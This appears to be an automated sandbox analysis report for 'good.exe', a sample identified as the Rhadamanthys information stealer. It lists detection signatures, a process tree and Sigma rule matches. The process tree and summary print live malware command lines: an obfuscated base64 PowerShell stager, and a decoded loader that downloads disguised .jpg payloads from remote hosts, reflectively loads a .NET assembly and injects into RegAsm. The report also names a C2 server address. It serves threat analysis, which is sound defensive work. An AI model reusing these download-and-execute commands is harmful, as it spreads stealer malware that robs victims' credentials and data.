
Windows Analysis Report
good.exe

Overview

General Information

Sample name: good.exe
Analysis ID: 1595244
MD5: 1f060be9fbfe90811a71414791ab8c1b
SHA1: 5ecbda765ea1c558ef61dc5933ab7aefc279e1b3
SHA256: b682165c83920ef53701d66dbc579701c402201b8dd0c150a7f3fff5195274fd
Tags: exe, worm, user-Joker

Detection

RHADAMANTHYS
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected RHADAMANTHYS Stealer
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks if the current machine is a virtual machine (disk enumeration)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • good.exe (PID: 7492 cmdline: "C:\Users\user\Desktop\good.exe" MD5: 1F060BE9FBFE90811A71414791AB8C1B)
    • cmd.exe (PID: 7520 cmdline: cmd.exe /c fwr.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 7592 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • powershell.exe (PID: 7916 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@1@DE@Nw@2@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@B
p@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YwBv@G0@bQBh@G4@Z@BC@Hk@d@Bl@HM@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@RgBy@G8@bQBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@p@Ds@I@@g@C@@J@B0@GU@e@B0@C@@PQ@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@Ds@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@UgBl@GY@b@Bl@GM@d@Bp@G8@bg@u@EE@cwBz@GU@bQBi@Gw@eQBd@Do@OgBM@G8@YQBk@Cg@J@Bj@G8@bQBt@GE@bgBk@EI@eQB0@GU@cw@p@Ds@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@
g@C@@I@@k@GM@bwBt@H@@cgBl@HM@cwBl@GQ@QgB5@HQ@ZQBB@HI@cgBh@Hk@I@@9@C@@RwBl@HQ@LQBD@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@LQBi@Hk@d@Bl@EE@cgBy@GE@eQ@g@CQ@ZQBu@GM@V@Bl@Hg@d@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B0@Hk@c@Bl@C@@PQ@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C4@RwBl@HQ@V@B5@H@@ZQ@o@Cc@d@Bl@HM@d@Bw@G8@dwBl@HI@cwBo@GU@b@Bs@C4@S@Bv@GE@YQBh@GE@YQBh@HM@Z@Bt@GU@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@BF@G4@YwBv@GQ@ZQBk@FQ@ZQB4@HQ@I@@9@Fs@QwBv@G4@dgBl@HI@d@Bd@Do@OgBU@G8@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bt@GU@d@Bo@G8@Z@@g@D0@I@@k@HQ@eQBw@GU@LgBH@GU@d@BN@GU@d@Bo@G8@Z@@o@Cc@b@Bm@HM@ZwBl@GQ@Z@Bk@GQ@Z@Bk@GQ@YQ@n@Ck@LgBJ@G4@dgBv@Gs@ZQ@o@CQ@bgB1@Gw@b@@s@C@@WwBv@GI@agBl@GM@d@Bb@F0@XQ@g@Cg@Jw@g@HQ@e@B0@C4@YwBo@EE@RgBB@G0@aw@v@HM@ZQBs@Gk@ZgBf@GM@aQBs@GI@dQBw@C8@N@@2@C4@Ng@y@DI@Lg@w@DY@Lg@y@DY@Lw@v@Do@Jw@s@C@@Jw@w@Cc@L@@g@Cc@UwB0@GE@cgB0@HU@c@BO@GE@bQBl@Cc@L@@g@Cc@UgBl@Gc@QQBz@G0@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8112 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?517613', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.chAFAmk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
            • RegAsm.exe (PID: 7256 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
              • fontdrvhost.exe (PID: 3384 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)
              • WerFault.exe (PID: 2188 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7256 -s 676 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • rundll32.exe (PID: 7720 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\" MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
Name: Rhadamanthys
Description: According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines. At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
Attribution: Sandworm
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
{"C2 url": "https://66.63.187.37:3606/59da4dae6feed0c3/o8xvdk37.s0kh1"}
Source | Rule | Description | Author | Strings
0000000C.00000003.2003819326.0000000002BF0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security |
0000000C.00000003.2008104480.0000000005120000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
0000000C.00000003.2008517695.0000000005340000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
0000000C.00000002.2037609353.0000000003070000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security |
0000000B.00000002.2010712842.0000000002F70000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security |
Source | Rule | Description | Author | Strings
12.3.fontdrvhost.exe.5120000.6.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
12.3.fontdrvhost.exe.5340000.7.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
12.3.fontdrvhost.exe.5340000.7.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |

Source | Rule | Description | Author | Strings
amsi64_8112.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

System Summary

                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@1@DE@Nw@2@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D
0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J
Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c fwr.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7520, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs" , ProcessId: 7592, ProcessName: wscript.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c fwr.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7520, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs" , ProcessId: 7592, ProcessName: wscript.exe
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c fwr.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7520, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs" , ProcessId: 7592, ProcessName: wscript.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\good.exe, ProcessId: 7492, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?517613', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); 